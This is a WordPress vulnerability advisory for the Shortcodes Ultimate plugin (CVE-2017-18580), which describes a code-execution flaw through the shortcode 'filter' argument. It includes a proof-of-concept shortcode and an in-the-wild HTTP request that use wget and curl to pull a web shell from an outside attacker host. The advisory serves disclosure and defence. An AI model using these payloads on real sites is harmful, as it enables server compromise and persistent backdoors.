Shortcodes Ultimate <= 5.0.0 - Authenticated Contributor Code Execution



Description
The Shortcodes Ultimate plugin does not sanitize the "filter" argument to the "su_meta", "su_user", and "su_post" shortcodes, allowing the filter to be set to the "system()" function which runs arbitrary code.

This is being exploited in the wild; I discovered this though analysis of mod_security audit logs on two compromised sites today.
Proof of Concept
If a contributor creates a draft post with this text:

[su_meta key=1 post_id=1 default='wget http://sazinco.ir/wp-content/shell.txt -O test.php' filter='system']

... then previews that post, Shortcodes Ultimate will run the code and save the malicious file as "test.php".

This is a simplified version of an exploit I saw this morning, which didn't require a contributor role account because it took advantage of the fact that another plugin ("Formidable Forms" accepts untrustedinput and passes it to do_shortcode(). That looked like this:

POST /wp-admin/admin-ajax.php HTTP/1.1

action=frm_forms_preview&form={'asdf-asdf'}&before_html=[su_meta key=1 post_id=1 default='curl http://sazinco.ir/wp-content/shell.txt > ../wp-content/upoad.php' filter='system']&custom_style=1

Affects Plugin

fixed in version 5.0.1

References

CVE 2017-18580
URL https://plugins.trac.wordpress.org/changeset/1756323/shortcodes-ultimate
URL https://blog.sucuri.net/2017/11/formidable-forms-shortcodes-ultimate-exploits-in-the-wild.html

Classification

Type PRIVESC
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-269

Miscellaneous

Submitter Robert Mathews
Submitter Website https://tigertech.net/
Submitter Twitter @TigerTech
Views 5538
Verified No
WPVDB ID 8945

Timeline

Publicly Published 2017-10-31 (almost 2 years ago)
Added 2017-11-07 (almost 2 years ago)
Last Updated 2019-08-22 (about 2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin